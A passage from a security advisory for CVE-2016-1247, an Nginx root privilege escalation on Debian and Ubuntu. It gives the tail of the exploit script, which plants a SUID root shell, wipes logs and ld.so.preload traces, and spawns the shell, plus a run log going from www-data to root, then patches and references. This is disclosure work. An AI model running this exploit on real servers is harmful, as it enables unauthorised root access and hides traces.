Check for the rootshell ls -l $BACKDOORPATH ls -l $BACKDOORPATH | grep rws | grep -q root if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m" else echo -e "\n[!] Failed to get root" cleanexit 2 fi rm -f $ERRORLOG echo > $ERRORLOG # Use the rootshell to perform cleanup that requires root privilges $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" # Reset the logging to error.log $BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`" # Execute the rootshell echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" $BACKDOORPATH -p -i # Job done. cleanexit 0 --------------------------------------------------- ``` Example run ~~~~~~~~~~~~~ ``` www-data@jessie:~/html/poc-app/uploads$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@jessie:~/html/poc-app/uploads$ dpkg -l | grep -i nginx ii nginx 1.6.2-5+deb8u2 all small, powerful, scalable web/proxy server ii nginx-common 1.6.2-5+deb8u2 all small, powerful, scalable web/proxy server - common files ii nginx-full 1.6.2-5+deb8u2+b1 amd64 nginx web/proxy server (standard version) www-data@jessie:~/html/poc-app/uploads$ ls -ld /var/log/nginx drwxr-x--- 2 www-data adm 4096 Nov 15 23:38 /var/log/nginx www-data@jessie:~/html/poc-app/uploads$ ./nginxed-root.sh /var/log/nginx/error.log _______________________________ < Is your server (N)jinxed ? ;o > ------------------------------- \ \ __---__ _- /--______ __--( / \ )XXXXXXXXXXX\v. .-XXX( O O )XXXXXXXXXXXXXXX- /XXX( U ) XXXXXXX\ /XXXXX( )--_ XXXXXXXXXXX\ /XXXXX/ ( O ) XXXXXX \XXXXX\ XXXXX/ / XXXXXX \__ \XXXXX XXXXXX__/ XXXXXX \__----> ---___ XXX__/ XXXXXX \__ / \- --__/ ___/\ XXXXXX / ___--/= \-\ ___/ XXXXXX '--- XXXXXX \-\/XXX\ XXXXXX /XXXXX \XXXXXXXXX \ /XXXXX/ \XXXXXX > _/XXXXX/ \XXXXX--__/ __-- XXXX/ -XXXXXXXX--------------- XXXXXX- \XXXXXXXXXXXXXXXXXXXXXXXXXX/ ""VXXXXXXXXXXXXXXXXXXV"" Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) nginxed-root.sh (ver. 1.0) Discovered and coded by: Dawid Golunski https://legalhackers.com [+] Starting the exploit as: uid=33(www-data) gid=33(www-data) groups=33(www-data) [+] Compiling the privesc shared library (/tmp/privesclib.c) [+] Backdoor/low-priv shell installed at: -rwxr-xr-x 1 www-data www-data 1029624 Nov 15 23:54 /tmp/nginxrootsh [+] The server appears to be (N)jinxed (writable logdir) ! :) Symlink created at: lrwxrwxrwx 1 www-data www-data 18 Nov 15 23:54 /var/log/nginx/error.log -> /etc/ld.so.preload [+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am... [+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: -rw-r--r-- 1 www-data root 19 Nov 15 23:55 /etc/ld.so.preload [+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload [+] The /etc/ld.so.preload file now contains: /tmp/privesclib.so [+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! -rwsrwxrwx 1 root root 1029624 Nov 15 23:54 /tmp/nginxrootsh [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1029624 Nov 15 23:54 /tmp/nginxrootsh The server is (N)jinxed ! ;) Got root via Nginx! [+] Spawning the rootshell /tmp/nginxrootsh now! nginxrootsh-4.3# id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data) nginxrootsh-4.3# whoami root ``` Note: You can force log rotation during testing with: logrotate -f /etc/logrotate.d/nginx Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html VI. BUSINESS IMPACT ------------------------- An attacker who has managed to exploit a vulnerable web application could use the vulnerability to escalate their privileges to root. VII. SYSTEMS AFFECTED ------------------------- Debian: Fixed in Nginx 1.6.2-5+deb8u3 Ubuntu: Fixed in the following updated Nginx package versions on Ubuntu: Ubuntu 16.04 LTS: 1.10.0-0ubuntu0.16.04.3 Ubuntu 14.04 LTS: 1.4.6-1ubuntu3.6 Ubuntu 16.10: 1.10.1-0ubuntu1.1 VIII. SOLUTION ------------------------- Vendors were sent this advisory in advance and released patches prior to the publication of the exploit. Update to the latest nginx packages on your distribution. https://www.debian.org/security/2016/dsa-3701 https://www.ubuntu.com/usn/usn-3114-1/ IX. REFERENCES ------------------------- https://legalhackers.com This advisory: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html Exploit code: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh CVE-2016-1247: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1247 Video PoC: https://legalhackers.com/videos/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html Debian security: https://www.debian.org/security/2016/dsa-3701 https://security-tracker.debian.org/tracker/CVE-2016-1247 Ubuntu security: https://www.ubuntu.com/usn/usn-3114-1/ X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com XI. REVISION HISTORY ------------------------- 15.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
idSSV:92538
last seen2017-11-19
modified2016-11-16
published2016-11-16
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-92538
titleNginx privilege elevation vulnerability (Debian, Ubuntu distributions)

References